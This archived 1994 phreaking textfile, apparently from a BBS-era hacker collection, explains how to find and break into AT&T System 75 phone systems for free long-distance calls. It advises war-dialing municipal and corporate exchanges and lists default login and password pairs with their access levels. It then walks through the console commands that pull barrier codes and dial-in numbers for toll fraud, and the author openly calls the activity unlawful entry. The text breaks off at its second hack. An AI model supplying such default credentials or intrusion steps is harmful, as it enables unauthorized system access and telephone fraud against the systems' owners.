home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Textfiles
/
k0p - oleBuzzard
/
System7.5Guide.txt
< prev
next >
Wrap
Text File
|
1998-02-21
|
16KB
|
345 lines
#######################################################
# #
# oleBuzzard's %%%%%%%%%%%%%% %%%%%%%%%% #
# %%%%%%%%%%%%%% %%%%%%%%%% #
# Compleat Guide To %%%%%% %%%% #
# %%%%%% %%%% #
# ### ## ## ## ### %%%%%%%%%% #
# ## ##### ## ## ## ## ##### %%%%%%%%% #
# ### ### ### ### ### ### %%%% #
# ##### ## #### #### ##### ## %%%% #
# ### #### #### ### %%%%%% #
# #
###########################################05-Jan-94###
INTRODUCTION/SCORN
You know, I've always hated 'Elitism' in the BBS world. For me, the reason
why I got into BBSing was because of my enthusiasm for computers and my
obsession with information. I thrive off of knowledge and reap the
benefits. My only obstacle in life are those I have encountered who felt I
was not worthy of the information I sought. These people make me sick,
especially the ones who know so very little yet think they know oh so much.
Which brings me to todays topic: System 75.
You want to know how you can tell a real lamer? Ask him for information
about System 75. 9 times out of 10, the person will scoff at you and act as
if he was the head of the Joint Chiefs of Staff and you were a Private
asking HIM about covert maneuvers in the Asian Theatre. This attitude most
apparently reveals itself in almost every file on System 75 I have ever
read. I have yet to read a file on System 75 (including the one in Phrack
41) that included even one default, or even information on how to find a
Sys75. Its a fucking joke and not a very funny one. Although Sys75s are
very intereseting systems to hack, they are hardly worthy of the coveted
status they receive. (Of course, in my opinion no information is worthy of
coveted status, but thats another story.) The truth is Sys75s are great
systems because they are relativley easy to learn and manipulate and they
are one of the only systems that in and of themselves involve a blending of
hacking and phreaking. This file will aid you in your first attempt at
Sys75 and hopefully give you an adequate and useful introduction to one of
the undergrounds favorite systems.
SYSTEM 75 INFO
System 75 is a hardware/software based multi-purpose communications system
offering a wide range of business applications, including Voice Mail
(AUDIX), networking (ISDN) and long-distance teleconferencing (PBX!!!) For
purposes of this file we will focus on Sys75s Long-Distance
teleconferencing capabilities as made possible by the Public Branch
Exchange.
System 75s have the ability to establish a new PBX or retreive all the
information about an existing PBX. In either case, if you can accomplish
the task at hand - retreiving PBX info or establishing a new PBX - the end
result is the same, free phone calls -- a valuable commodity in the realm
of underground communications. This is why System 75s are so popular and
information on them so coveted. Unfortunatley if you don't know what you're
looking for or what you're doing you won't get far. Thats what this file is
for. To Aid you in finding a Sys75 and help you to correctly manipulate the
system once you've found it. (You can thank me later.)
HACKING SYSTEM 75
In the following pages you will see many screens from an ACTUAL System 75
(ooo!) The screens will be within various steps of either retrieving
information on an existing PBX or on establishing a new PBX. Some useful
but nonessential information may be cut out and as well some information
may be ommitted for security reasons. But rest assured there will be more
than enough information retained to help you establish your very own PBX.
PART 1: Finding and Identifying a System 75
Well finding and identifying a System 75 are relativley easy tasks so I
won't spend much time on it, but I will note that finding and identifying,
although complementary, are two different tasks. I have often seen
information on identifying a Sys75, but I have never seen anything on how
to actually find one. If you can't find one, who cares how to identify
one!?!
Finding A System 75
When trying to find a System 75, I suggest you employ a quality scanner
that is reliable and bug free. My experience is that very few scanners meet
this criteria and instead most have glitches to the point that they are all
but useless. Of course nothing is without exception. There are a few
scanners I have found to be relativley reliable. These include ToneLoc
.098, BlueBeep .007 and on the Macintosh, Holy War Dialer v2.0.
Once you have found a reliable scanner I suggest you configure it with the
following parameters to ensure optimal scan speed without missing a System
and to cut down on the amount of unnecessary scanning.
Baud Rate: 2400 [Scanning for all baud rates UP TO 2400 inclusive]
Time Interval: approx. 18sec. [Different scanners, different count but 18
seconds in real time is about right]
Starting #: xxx-0000 [ALWAYS start here]
Ending #: xxx-0500 [I have never found a Sys75 past 0500 and in fact
most I have found have been in the xxx-00xx range
or in other words, with in the first 99 numbers of
an exchange.]
I would suggest looking for a Sys75 in your citys Municipal Government
exchange first. Where I live all city and county facilities with in the
city (courthouse, police, PUC, etc) have the same exchange. Start your scan
in this exchange(s) because there is almost certainly System 75 set-up.
Once you find a Sys75 in an exchange move to another exchange to look for
the next one. Some have argued (correctly so) that there are sometimes more
than one Sys75 in an exchange. Although they are correct I have found far
more Sys75s by searching the first 500 numbers of many exchanges than 9999
numbers in a few. Also, only once have I found more than one Sys75 in an
exchange.
Once you have exhausted your scan of the municipal exchange(s) I suggest
moving to an exchange assigned to a large company. In many cases there are
company facilities so large they are assigned their own exchange. These
facilities almost certainly have a Sys75 set up, so check it out. Examples
of facilities I know of that have their own exchange and a Sys75 within
that exchange are IBM, HP, DEC and KAMAN Sciences in the city of You
Wishville.
My final tip on finding a System 75 is to scan at night. It cuts down on
the possibility of hitting a system which is in use and thus has the line
occupied. Of course if all you guys hack at night then the line will be
busy anyway and it won't matter, so....
Identifying A System 75
You'll be able to identify a System 75 by the following information which
appears when you have connected to one.
PROTOCOL: NONE
CONNECT 1200 [1200 baud is a good indicator that you have found a Sys75]
KEYBOARD LOCKED, WAIT FOR LOGIN [Short pause here]
Login:
Ok, well thats what a System 75 looks like when you've first connected. You
don't have to hit any special keystrokes at this point and all entries end
with <CR>.
PART 2: Logging In
Passwords, password, passwords! The assholes never give you the fuckin
passwords. What the fuck does a tutorial on System 75 do if it doesn't
include a password so you can actually do something?!? Not much in my
opinion. Well Sys75s have two types of passwords. Those which can alter
information and those which can only browse information. The following is a
list of ALL Sys75 defaults. Although the list is complete there is no
gaurantee that all or any of them work. Also, because the access for the
defaults is assignable you have to check for yourself to see which defaults
alter and which defaults can only browse. The information I am providing is
for the last Sys75 I hacked.
System 75 Default Accounts
Login Password Type
----- -------- ----
bcim bcimpw didn't work
bcms bcms didn't work
blue bluepw altering
browse looker browsing
craft craftpw didn't work
cust custpw browsing
enquiry enquirypw browsing
inads inads didn't work
init initpw didn't work
locate locatepw browsing
maint rwmaint altering
rcust rcustpw altering
support supportpw didn't work
tech field altering
Once you've logged in you will be prompted to enter the Terminal Type.
Terminal Type (513, 4410, 4425): [513] 513
\
Enter 513, thats the default.
And then you will see the world famous login screen:
_____________________________________________________________________________
Copyright (c) 1986 - AT&T
Unpublished & Not for Publication
All Rights Reserved
_____________________________________________________________________________
enter command: _
PART 3: Hack 1 - Retreiving PBX Information
The following information is on how to retreive PBX info for your own use.
This is the safest method of hacking Sys75 because it doesn't require
altering ANY information. This is relativley easy so I'll go through it
quick. You will be given the prompt, enter command: You can basically enter
everything I enter word for word to make the hack.
enter command: disp rem [short for display remote-access]
_____________________________________________________________________________
display remote-access Page 1 of 1
Remote Access Extension: 2531
Barrier Code Length: 5 \
Authorization Code Required? n PBX already established
BARRIER CODE ASSIGNMENTS (Enter up to 10)
Barrier Code COR COS Barrier Code COR COS
1: 49138 1 1 6: 1 1
2: \ 1 1 7: 1 1
3: Code 1 1 8: 1 1
4: 1 1 9: 1 1
5: 1 1 10: 1 1
In this (rare) instance we have found a Sys75 with a PBX already set up.
All we have to do is find the corresponding trunk-group and get the dial-in
number. The trunk group contains all the routing information for the trunk
the PBX goes through.
* NOTE * Write down the Barrier Code. You will need it! (duh!)
To find the trunk that corresponds to the established PBX we will be
looking for a trunk group with a Night Service extension the same as the
Remote Access Extension (from disp rem).
enter command: disp trunk 1
_____________________________________________________________________________
display trunk-group 1 Page 1 of 5
Group Number: 1 Group Type: did SMDR Reports? y
Group Name: Intra-Lata COR: 1 TAC: 50
Data Restriction? n
MIS Measured? n
Auth Code? n
q
TRUNK PARAMETERS
Trunk Type: wink-start Incoming Rotary Timeout(sec): 5
Incoming Dial Type: tone
Trunk Termination: 600ohm Disconnect Timing(msec): 300
Digit Treatment: Digits:
Expected digits:
ACA Assignment? n
Maintenance Tests? y
Answer Supervision Timeout:
___________________________________________________________________________
Well this ain't it because this one doesn't even contain a Night Service. A
Night Service is important because it determines whether or not a PBX is 24
hour or not. No Night Service means during business hours only. For
purposes of this hack a Night Service is important because it will identify
the correct trunk.
Because there is no Night Service we won't bother to check the other four
pages (Note the top of the screen says Page 1 of 5). Normally we would
check the other pages and we would do so by hitting ESC [U for next page.
Instead we'll cancel the last command and check some other trunks. At the
prompt enter ESC Ow
Go through all the trunks until you find one with a corresponding Night
Service. The process for going through trunks is simple. Enter disp trunk x
(where x is a number from 1 to 99) and hit <CR>. If you don't see a Night
Service or if you see a Night Service and the extension following the Night
Service doesn't match the Remote Access Extension then hit ESC Ow and goto
the next trunk and repeat the process.
enter command: disp trunk 6
_____________________________________________________________________________
display trunk-group 6 Page 1 of 5
Group Number: 6 Group Type: co SMDR Reports? y
Group Name: Intra-Lata COR: 7 TAC: 25
Direction: two-way Outgoing Display? n Data Restriction? n
MIS Measured? n
Dial Access? y Busy Threshold: 1 Night Service: 2531
Queue Length: 1 Abandoned Call Search? n Incoming Destination:
Comm Type: voice Auth Code? n Digit Absorption List:
Prefix-1? y Restriction: toll Allowed Calls List? y
TRUNK PARAMETERS
Trunk Type: loop-start
Outgoing Dial Type: tone
Trunk Termination: rc Disconnect Timing(msec): 500
ACA Assignment? n
Maintenance Tests? y
Answer Supervision Timeout: Suppress # Outpulsing? n
_____________________________________________________________________________
Well we found it. Notice the Night Service and extension. This group has
Night Service and it has an extension the same as the remote-access
extension. Next all we need to do is find out the dial-in number. At the
prompt enter: ESC [U for the next page.
_____________________________________________________________________________
display trunk-group 6 Page 2 of 5
GROUP MEMBER ASSIGNMENTS
Port Name Mode Type Answer Delay
1: D2003 635xxxx
2: D2004 635xxxx
3: D2005 635xxxx
4: D2006 635xxxx
5: D2002 635xxxx
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
_____________________________________________________________________________
Well I decided not to include the complete dial-in number, but you get the
idea. All you have to do at this point is write down ALL the dial-in
numbers and logoff. Type ESC Ow to cancel (exit) and at the prompt type:
logoff to (guess.)
Now dial one of the dial-in numbers and enter the Barrier Code+9+1+ACN and
thats it. No changes made and you've only committed one count of unlawful
entry of a computer system (10 days with work release tops). Now you have
an unabused PBX for personal use or trade.
PART 4: Hack 2 - Setting Up A PBX